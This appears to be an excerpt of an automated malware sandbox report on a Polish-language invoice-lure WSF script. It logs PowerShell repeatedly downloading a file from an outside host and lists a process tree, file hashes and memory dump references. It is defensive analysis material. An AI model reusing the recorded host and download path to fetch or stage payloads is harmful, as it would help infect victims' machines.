              116 | 192.168.2.6 | 62429 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:49.801388025 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              117 | 192.168.2.6 | 62430 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:49.814071894 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              118 | 192.168.2.6 | 62437 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:53.831067085 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              119 | 192.168.2.6 | 62438 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:05:53.844997883 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive



              Target ID:0
              Start time:05:01:47
              Start date:08/10/2024
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf"
              Imagebase:0x7ff76ea80000
              File size:170'496 bytes
              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:2
              Start time:05:01:47
              Start date:08/10/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /c ping 6777.6777.6777.677e
              Imagebase:0x7ff633ff0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:05:01:47
              Start date:08/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:05:01:47
              Start date:08/10/2024
              Path:C:\Windows\System32\PING.EXE
              Wow64 process (32bit):false
              Commandline:ping 6777.6777.6777.677e
              Imagebase:0x7ff785860000
              File size:22'528 bytes
              MD5 hash:2F46799D79D22AC72C241EC0322B011D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              Target ID:5
              Start time:05:01:48
              Start date:08/10/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "..."
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:6
              Start time:05:01:48
              Start date:08/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Reset < >
                Memory Dump Source
                • Source File: 00000005.00000002.4648426659.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd347c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e5c9d951e9318dbbe6de791989fcbd5a4999d704c91048c323946ee8157f524
                • Instruction ID: b055c3ec0e5fe6ba34aa67112d8c4b30c14477fff99548ff77f81228a931c27f
                • Opcode Fuzzy Hash: 5e5c9d951e9318dbbe6de791989fcbd5a4999d704c91048c323946ee8157f524
                • Instruction Fuzzy Hash: E69128A2B0DA9A6FE7A8D61C58B61B577D1EF97210B08017FD54EC3193ED1DBC019281
                Memory Dump Source
                • Source File: 00000005.00000002.4648426659.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                Memory Dump Source
                • Source File: 00000005.00000002.4648117684.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false